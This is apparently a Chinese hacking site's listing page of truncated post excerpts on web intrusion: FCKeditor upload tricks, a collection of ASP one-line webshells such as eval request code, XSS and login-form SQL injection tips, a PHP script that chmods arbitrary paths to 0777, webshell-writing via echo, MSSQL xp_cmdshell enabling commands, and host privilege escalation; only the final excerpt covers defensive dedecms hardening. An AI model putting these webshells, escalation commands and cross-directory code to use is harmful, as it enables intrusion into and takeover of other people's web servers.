解决Fckeditor删除所有上传页面如何上传
首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html 其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/fileman...
webshell一句话木马大全
比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request("sb")%> 程序代码 <%execute request("sb")%> 程序代码 <%execute(request("sb"))%> 程序代码 <%execute request("sb")%><%'...
XSS两三事(第一季)
Author:ShadowHider Email:s@xeye.us 这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。 下面分享几个不算tips的tips,应该很多大牛在利用XSS时都注意到了,但我还是再写一下吧,帮大家做个备忘。:P #1 使用img标签进行CSRF 之前瞌睡龙兄弟在htt...
后台登陆框post注入
作者:knife 目录 0×00 踩点 0×01 寻找漏洞 0×02 利用漏洞 0×03 完结 0x00 踩点 再一次授权情况下 ,本人对骚狐 旗下某个站点发起了一次 友情的渗透 在不知道任何信息的情况下,本人先对骚狐的一些基本服务器信息做了了解 情况如下 服务器是:unix 系统 web版本:nginx/0.7.69 ip:xxx.xxx.xxx.xxx 用了反向代理 0x01 寻找漏洞 对于服...
aspx-webshell注册表浏览器
上传好几个ASPX的webshell都被杀了 这个查看注册表竟然生存一下来了 不错 要的就赶紧下载吧 下载:reg
linux不提权跨目录访问的代码
linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。 代码如下: <?php $path = stripslashes($_GET ['path'] ); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permission editab...
谈对星外主机提权利用
T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外 ...
关于旁注的一点点方法总结
很多同学旁注的时候发现不能直跳转到目标目录后就想到了提权, 然而,对我等菜鸟来说,提权现在是越来越难。很多时候,其实不一定要提权,我们可以想想其它方法。 这里简单介绍旁注时比较有用的跨目录读写文件。 1、跨目录写文件。 很多时候,我们不能直接跳转浏览目标目录,这时候就可以尝试直接写文件到目标目录了 。 这里就要求我们要有执行命令的权限了, 方法是用echo或copy命令:echo ^<%ex...
mssql_sa下常用和不常用提权操作大全
1. 开启和关毕xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EX...
dedecms程序六个安全措施
近期,有部分无聊人士喜欢利用0day 找到程序的漏洞上传流量攻击脚本,让人很头疼。目前发现的99%是dedecms程序漏洞,如果您正在使用dedecms程序,请看下面的几个步骤。 1.在dedecms的后台更新补丁,尽可能升级为最新版本。 2.data、templets、uploads、install这几个目录去掉写的权限 。 3.如果只是使用文章系统并没有使用会员功能,则强推推荐:关闭会员功能、...